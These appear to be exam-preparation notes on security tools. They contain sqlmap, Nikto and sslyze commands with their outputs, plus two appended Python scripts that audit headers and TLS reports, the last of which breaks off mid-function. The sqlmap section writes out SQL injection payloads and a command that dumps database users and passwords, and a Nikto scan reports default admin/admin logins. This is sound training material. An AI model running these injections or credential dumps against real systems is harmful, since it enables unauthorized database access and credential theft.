Preparation

Thomas Gossweiler

Created: 03/24/2021 7:56 PM - Updated: 06/29/2021 11:23 PM

Exam preparation

The following tools are used for the exam.


Python 3.x


https://www.programiz.com/python-programming/list

 


Snort 2.x


Snort installation on pfSense

https://www.snort.org/ 

 


SQLite




sslyze

sslyze 

$ pip install --upgrade sslyze
$ python -m sslyze www.yahoo.com www.google.com "[2607:f8b0:400a:807::2004]:443"

$ python -m sslyze --regular www.google.com --json_out=results.json
$ python -m sslyze -h





Time Sketch




Volatility
https://github.com/volatilityfoundation/volatility/wiki 



Wireshark

 https://youtu.be/lb1Dw0elw0Q 




Display Filter Reference



A. Nessus Essentials (Community Edition)

========================================

Limited to 16 IP addresses

1. Installation

https://www.tenable.com/downloads/nessus?loginAttempted=true

- Windows

- OSX

- GNU/Linux



B. Web Application Security Scanner

===================================

1. Scanner

- Nikto

- SQLmap

2. SQLmap example

$ cat requests.txt

POST /index.php HTTP/1.1

Host: 10.11.1.252:8000

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://10.11.1.252:8000/login.php

Cookie: PHPSESSID=cbdnommft9ggiii89h0ia9caa0

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 39

username=admin*&password=b&submit=Log+In

$ sqlmap -r requests.txt --time-sec 10 --risk 3 --level 3 --technique BEUSTQ --threads 10 --dbms=mysql --users --passwords

[…]

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 246 HTTP(s) requests:

---

Parameter: #1* ((custom) POST)

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause

    Payload: username=-2383' OR 7488=7488-- psJp&password=b&submit=Log In


    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind

    Payload: username=admin' AND SLEEP(10)-- VsjK&password=b&submit=Log In

---

[06:22:24] [INFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 5.10

web application technology: Apache 2.2.3, PHP 5.1.6

back-end DBMS: MySQL >= 5.0.12


3. Example

$ nikto -useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0" -port 80 -host 10.11.1.39

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          10.11.1.39

+ Target Hostname:    10.11.1.39

+ Target Port:        80

+ Start Time:         2018-12-10 17:02:54 (GMT-5)

---------------------------------------------------------------------------

+ Server: nginx/1.6.3

+ Server leaks inodes via ETags, header found with file /, fields: 0x1321 0x5058a1e728280

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE

+ OSVDB-3268: /icons/: Directory indexing found.

+ OSVDB-3233: /icons/README: Apache default file found.

+ Retrieved x-powered-by header: OTRS 5.0.2 - Open Ticket Request System (http://www.otrs.com/)

+ Uncommon header 'content-disposition' found, with contents: filename="Installer.html"

+ 8346 requests: 0 error(s) and 9 item(s) reported on remote host

+ End Time:           2018-12-10 17:23:23 (GMT-5) (1229 seconds)


4. Example

$ nikto -useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0" -port 8080 -host 192.168.68.67

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          192.168.68.67

+ Target Hostname:    192.168.68.67

+ Target Port:        8080

+ Start Time:         2019-03-01 04:46:31 (GMT-5)

---------------------------------------------------------------------------

+ Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.5.30

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ / - Requires Authentication for realm 'My restricted Area'

+ Default account found for 'My restricted Area' at / (ID 'admin', PW 'admin'). Generic account discovered..

+ Root page / redirects to: http://192.168.68.67/dashboard/

+ Retrieved x-powered-by header: PHP/5.5.30

+ PHP/5.5.30 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.

+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var

+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x78ae 0x51affc7a4c400

+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

+ Cookie PHPSESSID created without the httponly flag

+ Cookie PHPSESSIDCV created without the httponly flag

+ Cookie javascript_enabled_detect created without the httponly flag

+ /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin

+ OSVDB-3268: /img/: Directory indexing found.

+ OSVDB-3092: /img/: This might be interesting...

+ OSVDB-3268: /icons/: Directory indexing found.

+ OSVDB-3233: /icons/README: Apache default file found.

+ 8373 requests: 0 error(s) and 17 item(s) reported on remote host

+ End Time:           2019-03-01 05:05:17 (GMT-5) (1126 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

5. Example

$ nikto -useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0" -port 80 -host 10.11.1.10

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          10.11.1.10

+ Target Hostname:    10.11.1.10

+ Target Port:        80

+ Start Time:         2018-11-14 16:26:27 (GMT-5)

---------------------------------------------------------------------------

+ Server: Microsoft-IIS/6.0

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST

+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST

+ Uncommon header 'server-error' found, with contents: true

+ Cookie CFID created without the httponly flag

+ Cookie CFTOKEN created without the httponly flag

+ Cookie CFAUTHORIZATION_cfadmin created without the httponly flag

+ OSVDB-3399: /CFIDE/administrator/index.cfm: ColdFusion Administrator for ColdFusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0538. ALLAIRE:ASB00-14. http://www.securityfocus.com/bid/1314.

+ Cookie CFAUTHORIZATION_componentutils created without the httponly flag

+ /CFIDE/componentutils/cfcexplorer.cfc: ColdFusion Component Browser. Default password may be 'admin'.

+ Cookie JSESSIONID created without the httponly flag

+ /flex2gateway/http: Adobe BlazeDS identified.

+ 7517 requests: 0 error(s) and 14 item(s) reported on remote host

+ End Time:           2018-11-14 16:43:04 (GMT-5) (997 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested
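The findings Nikto repeats across the three scans above (missing X-Frame-Options, X-Content-Type-Options and X-XSS-Protection headers, cookies without the httponly flag, TRACE enabled, version disclosure in Server/X-Powered-By, inode-leaking ETags) can be re-checked on a single captured response before and after hardening. The following script is an added example, not part of the original page or of Nikto; the response it audits is a constructed sample modelled on the scans above.

```python
"""Audit one raw HTTP response for the hardening gaps Nikto reports above.

Added example, not code from the page or from Nikto. SAMPLE_RESPONSE is a
constructed response header block resembling the scanned hosts above.
"""
from typing import Dict, List

# Constructed sample: typical of the hosts scanned above (not a real capture)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.5.30\r\n"
    "X-Powered-By: PHP/5.5.30\r\n"
    "ETag: \"78ae-51affc7a4c400\"\r\n"
    "Allow: GET, HEAD, POST, OPTIONS, TRACE\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Set-Cookie: javascript_enabled_detect=true; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Parse a raw HTTP/1.x response into a case-insensitive header multimap."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")[1:]  # drop the status line
    headers: Dict[str, List[str]] = {}
    for line in lines:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def audit_response(raw: str) -> List[str]:
    """Return hardening findings for one response, phrased like Nikto's output."""
    h = parse_headers(raw)
    findings: List[str] = []
    required = {
        "x-frame-options": "anti-clickjacking X-Frame-Options header is not present",
        "x-content-type-options": "X-Content-Type-Options header is not set",
        # legacy header: Nikto still reports it, current browsers ignore it
        "x-xss-protection": "X-XSS-Protection header is not defined",
    }
    for name, message in required.items():
        if name not in h:
            findings.append(message)
    for cookie in h.get("set-cookie", []):
        cookie_name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(f"Cookie {cookie_name} created without the httponly flag")
    for allow in h.get("allow", []):
        methods = {m.strip().upper() for m in allow.split(",")}
        if "TRACE" in methods:
            findings.append("HTTP TRACE method is active")
    for name in ("server", "x-powered-by"):
        for value in h.get(name, []):
            if any(ch.isdigit() for ch in value):
                findings.append(f"{name} header discloses a version: {value}")
    for etag in h.get("etag", []):
        if "-" in etag.strip('"'):  # Apache-style inode-size-mtime ETag
            findings.append("Server may leak inodes via ETags")
    return findings


if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE):
        print("+", finding)
```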



C. Wireshark

=============

Open Source

1. Installation

 https://www.wireshark.org/download.html

 - Windows

 - OSX

 - GNU/Linux

2. Example data

https://www.chappell-university.com/wireshark101-2ndedition

http://d3qsv2czxjcdqb.cloudfront.net/WS101_EssentialSkills_v2/wireshark101v2files.zip

3. User guide

https://www.wireshark.org/download/docs/user-guide.pdf

4. Further reading

https://www.amazon.de/Wireshark-101-Essential-Analysis-Solution/dp/1893939758/ref=sr_1_2



C. SSLyze

=========

Open Source

1. Installation

https://github.com/nabla-c0d3/sslyze/releases

- Windows

- OSX

- GNU/Linux

2. Information on individual cipher suites

https://ciphersuite.info

3. TLS Best Practices

https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices

4. Examples of defective certificates

https://badssl.com

5. Example

Additional options:

--starttls=rdp

--starttls=ldap

--starttls=ftp

--starttls=imap

--starttls=smtp

--starttls=pop3

$ sslyze --regular www.ubs.com:443

 CHECKING HOST(S) AVAILABILITY

 -----------------------------

   www.ubs.com:443                       => 2.16.13.151


 SCAN RESULTS FOR WWW.UBS.COM:443 - 2.16.13.151

 ----------------------------------------------

 * TLS 1.2 Session Resumption Support:

      With Session IDs: OK - Supported (5 successful resumptions out of 5 attempts).

      With TLS Tickets: OK - Supported.

 * Elliptic Curve Key Exchange:

       Supported curves:                  X25519, prime256v1

       Rejected curves:                   X448, prime192v1, secp160k1, secp160r1, secp160r2, secp192k1, secp224k1, secp224r1, secp256k1, secp384r1, secp521r1, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1

 * Certificates Information:

       Hostname sent for SNI:             www.ubs.com

       Number of certificates detected:   1

     Certificate #0 ( _RSAPublicKey )

       SHA1 Fingerprint:                  9420d191709805dd2579268da523c62f1770436d

       Common Name:                       www.ubs.com

       Issuer:                            DigiCert SHA2 Extended Validation Server CA

       Serial Number:                     2046900138870622124013464740506035175

       Not Before:                        2019-10-28

       Not After:                         2021-12-08

       Public Key Algorithm:              _RSAPublicKey

       Signature Algorithm:               sha256

       Key Size:                          2048

       Exponent:                          65537

       DNS Subject Alternative Names:     ['www.ubs.com', 'm.ubs.com']

     

Certificate #0 - Trust

       Hostname Validation:               OK - Certificate matches server hostname

       Android CA Store (9.0.0_r9):       OK - Certificate is trusted

       Apple CA Store (iOS 14, iPadOS 14, macOS 11, watchOS 7, and tvOS 14):OK - Certificate is trusted

       Java CA Store (jdk-13.0.2):        OK - Certificate is trusted

       Mozilla CA Store (2021-01-24):     OK - Certificate is trusted, Extended Validation

       Windows CA Store (2021-02-08):     OK - Certificate is trusted

       Symantec 2018 Deprecation:         OK - Not a Symantec-issued certificate

       Received Chain:                    www.ubs.com --> DigiCert SHA2 Extended Validation Server CA --> DigiCert High Assurance EV Root CA

       Verified Chain:                    www.ubs.com --> DigiCert SHA2 Extended Validation Server CA --> DigiCert High Assurance EV Root CA

       Received Chain Contains Anchor:    WARNING - Received certificate chain contains the anchor certificate

       Received Chain Order:              OK - Order is valid

       Verified Chain contains SHA1:      OK - No SHA1-signed certificate in the verified certificate chain


     Certificate #0 - Extensions

       OCSP Must-Staple:                  NOT SUPPORTED - Extension not found

       Certificate Transparency:          OK - 3 SCTs included


     Certificate #0 - OCSP Stapling

       OCSP Response Status:              SUCCESSFUL

       Validation w/ Mozilla Store:       OK - Response is trusted

       Responder Key Hash:                b'=\xd3P\xa5\xd6\xa0\xad\xee\xf3J`\ne\xd3!\xd4\xf8\xf8\xd6\x0f'

       Cert Status:                       GOOD

       Cert Serial Number:                2046900138870622124013464740506035175

       This Update:                       2021-06-20

       Next Update:                       2021-06-27


 * TLS 1.1 Cipher Suites:

     Attempted to connect using 80 cipher suites; the server rejected all cipher suites.


 * OpenSSL CCS Injection:

                                          OK - Not vulnerable to OpenSSL CCS injection

 * Deflate Compression:

                                          OK - Compression disabled

 * OpenSSL Heartbleed:

                                          OK - Not vulnerable to Heartbleed

 * Session Renegotiation:

       Client Renegotiation DoS Attack:   VULNERABLE - Server honors client-initiated renegotiations

       Secure Renegotiation:              OK - Supported

 * TLS 1.0 Cipher Suites:

     Attempted to connect using 80 cipher suites; the server rejected all cipher suites.


 * Downgrade Attacks:

       TLS_FALLBACK_SCSV:                 OK - Supported

 * TLS 1.3 Cipher Suites:

     Attempted to connect using 5 cipher suites.


     The server accepted the following 5 cipher suites:

        TLS_CHACHA20_POLY1305_SHA256                      256       ECDH: X25519 (253 bits)

        TLS_AES_256_GCM_SHA384                            256       ECDH: X25519 (253 bits)

        TLS_AES_128_GCM_SHA256                            128       ECDH: X25519 (253 bits)

        TLS_AES_128_CCM_SHA256                            128       ECDH: X25519 (253 bits)

        TLS_AES_128_CCM_8_SHA256                          128       ECDH: X25519 (253 bits)


 * SSL 3.0 Cipher Suites:

     Attempted to connect using 80 cipher suites; the server rejected all cipher suites.

 * TLS 1.2 Cipher Suites:

     Attempted to connect using 156 cipher suites.


     The server accepted the following 7 cipher suites:

        TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256       256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384             256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384             256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA                256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256             128       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256             128       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA                128       ECDH: prime256v1 (256 bits)

     The group of cipher suites supported by the server has the following properties:

       Forward Secrecy                    OK - Supported

       Legacy RC4 Algorithm               OK - Not Supported


 * SSL 2.0 Cipher Suites:

     Attempted to connect using 7 cipher suites; the server rejected all cipher suites.

 * ROBOT Attack:

                                          OK - Not vulnerable, RSA cipher suites not supported.

 SCAN COMPLETED IN 1.34 S

 ------------------------


6. Example

$ /usr/bin/sslyze --regular 10.10.10.228:443

 CHECKING HOST(S) AVAILABILITY

 -----------------------------

   10.10.10.228:443                       => 10.10.10.228


 SCAN RESULTS FOR 10.10.10.228:443 - 10.10.10.228

 ------------------------------------------------

 * Deflate Compression:

                                          OK - Compression disabled

 * TLS 1.2 Cipher Suites:

     Attempted to connect using 156 cipher suites.


     The server accepted the following 46 cipher suites:

        TLS_RSA_WITH_SEED_CBC_SHA                         128

        TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256              256

        TLS_RSA_WITH_CAMELLIA_256_CBC_SHA                 256

        TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256              128

        TLS_RSA_WITH_CAMELLIA_128_CBC_SHA                 128

        TLS_RSA_WITH_ARIA_256_GCM_SHA384                  256

        TLS_RSA_WITH_ARIA_128_GCM_SHA256                  128

        TLS_RSA_WITH_AES_256_GCM_SHA384                   256

        TLS_RSA_WITH_AES_256_CCM_8                        128

        TLS_RSA_WITH_AES_256_CCM                          256

        TLS_RSA_WITH_AES_256_CBC_SHA256                   256

        TLS_RSA_WITH_AES_256_CBC_SHA                      256

        TLS_RSA_WITH_AES_128_GCM_SHA256                   128

        TLS_RSA_WITH_AES_128_CCM_8                        128

        TLS_RSA_WITH_AES_128_CCM                          128

        TLS_RSA_WITH_AES_128_CBC_SHA256                   128

        TLS_RSA_WITH_AES_128_CBC_SHA                      128

        TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256       256       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384        256       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256        128       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384            256       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256            128       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384             256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384             256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA                256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256             128       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256             128       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA                128       ECDH: prime256v1 (256 bits)

        TLS_DHE_RSA_WITH_SEED_CBC_SHA                     128       DH (1024 bits)

        TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256         256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256          256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA             256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256          128       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA             128       DH (1024 bits)

        TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384              256       DH (1024 bits)

        TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256              256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_GCM_SHA384               256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CCM_8                    256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CCM                      256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CBC_SHA256               256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CBC_SHA                  256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_GCM_SHA256               128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CCM_8                    128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CCM                      128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CBC_SHA256               128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CBC_SHA                  128       DH (1024 bits)


     The group of cipher suites supported by the server has the following properties:

       Forward Secrecy                    OK - Supported

       Legacy RC4 Algorithm               OK - Not Supported


 * Certificates Information:

       Hostname sent for SNI:             10.10.10.228

       Number of certificates detected:   1


     Certificate #0 ( _RSAPublicKey )

       SHA1 Fingerprint:                  b0238c547a905bfa119c4e8baccaeacf36491ff6

       Common Name:                       localhost

       Issuer:                            localhost

       Serial Number:                     13098529066745705731

       Not Before:                        2009-11-10

       Not After:                         2019-11-08

       Public Key Algorithm:              _RSAPublicKey

       Signature Algorithm:               sha1

       Key Size:                          1024

       Exponent:                          65537

       DNS Subject Alternative Names:     []


     Certificate #0 - Trust

       Hostname Validation:               FAILED - Certificate does NOT match server hostname

       Android CA Store (9.0.0_r9):       FAILED - Certificate is NOT Trusted: self signed certificate

       Apple CA Store (iOS 14, iPadOS 14, macOS 11, watchOS 7, and tvOS 14):FAILED - Certificate is NOT Trusted: self signed certificate

       Java CA Store (jdk-13.0.2):        FAILED - Certificate is NOT Trusted: self signed certificate

       Mozilla CA Store (2021-01-24):     FAILED - Certificate is NOT Trusted: self signed certificate

       Windows CA Store (2021-02-08):     FAILED - Certificate is NOT Trusted: self signed certificate

       Symantec 2018 Deprecation:         ERROR - Could not build verified chain (certificate untrusted?)

       Received Chain:                    localhost

       Verified Chain:                    ERROR - Could not build verified chain (certificate untrusted?)

       Received Chain Contains Anchor:    ERROR - Could not build verified chain (certificate untrusted?)

       Received Chain Order:              OK - Order is valid

       Verified Chain contains SHA1:      ERROR - Could not build verified chain (certificate untrusted?)


     Certificate #0 - Extensions

       OCSP Must-Staple:                  NOT SUPPORTED - Extension not found

       Certificate Transparency:          NOT SUPPORTED - Extension not found


     Certificate #0 - OCSP Stapling

                                          NOT SUPPORTED - Server did not send back an OCSP response


 * TLS 1.2 Session Resumption Support:

      With Session IDs: OK - Supported (5 successful resumptions out of 5 attempts).

      With TLS Tickets: OK - Supported.


 * OpenSSL CCS Injection:

                                          OK - Not vulnerable to OpenSSL CCS injection

 * ROBOT Attack:

                                          OK - Not vulnerable.


 * TLS 1.1 Cipher Suites:

     Attempted to connect using 80 cipher suites.


     The server accepted the following 13 cipher suites:

        TLS_RSA_WITH_SEED_CBC_SHA                         128

        TLS_RSA_WITH_IDEA_CBC_SHA                         128

        TLS_RSA_WITH_CAMELLIA_256_CBC_SHA                 256

        TLS_RSA_WITH_CAMELLIA_128_CBC_SHA                 128

        TLS_RSA_WITH_AES_256_CBC_SHA                      256

        TLS_RSA_WITH_AES_128_CBC_SHA                      128

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA                256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA                128       ECDH: prime256v1 (256 bits)

        TLS_DHE_RSA_WITH_SEED_CBC_SHA                     128       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA             256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA             128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CBC_SHA                  256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CBC_SHA                  128       DH (1024 bits)


     The group of cipher suites supported by the server has the following properties:

       Forward Secrecy                    OK - Supported

       Legacy RC4 Algorithm               OK - Not Supported


 * TLS 1.3 Cipher Suites:

     Attempted to connect using 5 cipher suites.


     The server accepted the following 3 cipher suites:

        TLS_CHACHA20_POLY1305_SHA256                      256       ECDH: X25519 (253 bits)

        TLS_AES_256_GCM_SHA384                            256       ECDH: X25519 (253 bits)

        TLS_AES_128_GCM_SHA256                            128       ECDH: X25519 (253 bits)


 * Session Renegotiation:

       Client Renegotiation DoS Attack:   OK - Not vulnerable

       Secure Renegotiation:              OK - Supported


 * Downgrade Attacks:

       TLS_FALLBACK_SCSV:                 OK - Supported


 * Elliptic Curve Key Exchange:

       Supported curves:                  X25519, X448, prime256v1, secp384r1, secp521r1

       Rejected curves:                   prime192v1, secp160k1, secp160r1, secp160r2, secp192k1, secp224k1, secp224r1, secp256k1, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1


 * SSL 2.0 Cipher Suites:

     Attempted to connect using 7 cipher suites; the server rejected all cipher suites.


 * TLS 1.0 Cipher Suites:

     Attempted to connect using 80 cipher suites.


     The server accepted the following 13 cipher suites:

        TLS_RSA_WITH_SEED_CBC_SHA                         128

        TLS_RSA_WITH_IDEA_CBC_SHA                         128

        TLS_RSA_WITH_CAMELLIA_256_CBC_SHA                 256

        TLS_RSA_WITH_CAMELLIA_128_CBC_SHA                 128

        TLS_RSA_WITH_AES_256_CBC_SHA                      256

        TLS_RSA_WITH_AES_128_CBC_SHA                      128

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA                256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA                128       ECDH: prime256v1 (256 bits)

        TLS_DHE_RSA_WITH_SEED_CBC_SHA                     128       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA             256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA             128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CBC_SHA                  256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CBC_SHA                  128       DH (1024 bits)


     The group of cipher suites supported by the server has the following properties:

       Forward Secrecy                    OK - Supported

       Legacy RC4 Algorithm               OK - Not Supported


 * SSL 3.0 Cipher Suites:

     Attempted to connect using 80 cipher suites; the server rejected all cipher suites.


 * OpenSSL Heartbleed:

                                          OK - Not vulnerable to Heartbleed


 SCAN COMPLETED IN 8.83 S

 ------------------------
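The two reports above differ in exactly the properties a defender cares about (legacy protocol versions, static RSA key exchange, 1024-bit DH, SHA-1 signed and self-signed certificate), but that takes reading several hundred lines. The parser below triages the sslyze text report format shown above automatically. It is an added example, not part of the original page or of sslyze; SAMPLE_REPORT is a constructed excerpt in that format combining findings from the 10.10.10.228 scan.

```python
"""Triage an sslyze text report in the format of the scans above.

Added example, not code from the page or from sslyze. SAMPLE_REPORT is a
constructed excerpt that combines findings seen in the second scan above.
"""
import re
from typing import Dict, List

SAMPLE_REPORT = """\
 * TLS 1.2 Cipher Suites:
     The server accepted the following 3 cipher suites:
        TLS_RSA_WITH_AES_128_CBC_SHA                      128
        TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256             128       ECDH: prime256v1 (256 bits)
        TLS_DHE_RSA_WITH_AES_256_CBC_SHA                  256       DH (1024 bits)
 * Certificates Information:
       Common Name:                       localhost
       Issuer:                            localhost
       Signature Algorithm:               sha1
       Key Size:                          1024
       Hostname Validation:               FAILED - Certificate does NOT match server hostname
       Mozilla CA Store (2021-01-24):     FAILED - Certificate is NOT Trusted: self signed certificate
 * TLS 1.0 Cipher Suites:
     The server accepted the following 1 cipher suites:
        TLS_RSA_WITH_IDEA_CBC_SHA                         128
 * SSL 3.0 Cipher Suites:
     Attempted to connect using 80 cipher suites; the server rejected all cipher suites.
"""

SECTION_RE = re.compile(r"^ \* (.+):\s*$")          # ' * TLS 1.2 Cipher Suites:'
SUITE_RE = re.compile(r"^\s+((?:TLS|SSL)_\S+)\s+\d+(?:\s+(.*\S))?\s*$")
KV_RE = re.compile(r"^\s+([^:]+?):\s+(\S.*?)\s*$")  # '   Key Size:   1024'
LEGACY_PROTOCOLS = ("SSL 2.0", "SSL 3.0", "TLS 1.0", "TLS 1.1")
LEGACY_CIPHERS = ("RC4", "IDEA", "SEED", "3DES", "_DES_", "NULL", "EXPORT")


def parse_sections(text: str) -> Dict[str, List[str]]:
    """Group the report's lines under the ' * Section:' heading they follow."""
    sections: Dict[str, List[str]] = {}
    current = None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            sections[current] = []
        elif current is not None and line.strip():
            sections[current].append(line)
    return sections


def key_values(lines: List[str]) -> Dict[str, str]:
    pairs = (KV_RE.match(line) for line in lines)
    return {m.group(1).strip(): m.group(2) for m in pairs if m}


def triage(text: str) -> List[str]:
    """Return the weaknesses a defender would want fixed on the scanned server."""
    findings: List[str] = []
    for name, lines in parse_sections(text).items():
        if name.endswith(" Cipher Suites"):
            proto = name[: -len(" Cipher Suites")]
            suites = [m for m in map(SUITE_RE.match, lines) if m]
            if proto in LEGACY_PROTOCOLS and suites:
                findings.append(f"{proto} enabled: {len(suites)} cipher suite(s) accepted")
            for m in suites:
                suite, kex = m.group(1), m.group(2) or ""
                if suite.startswith("TLS_RSA_WITH_"):  # static RSA key exchange
                    findings.append(f"{proto}: no forward secrecy: {suite}")
                dh = re.search(r"\bDH \((\d+) bits\)", kex)  # finite-field DH only
                if dh and int(dh.group(1)) < 2048:
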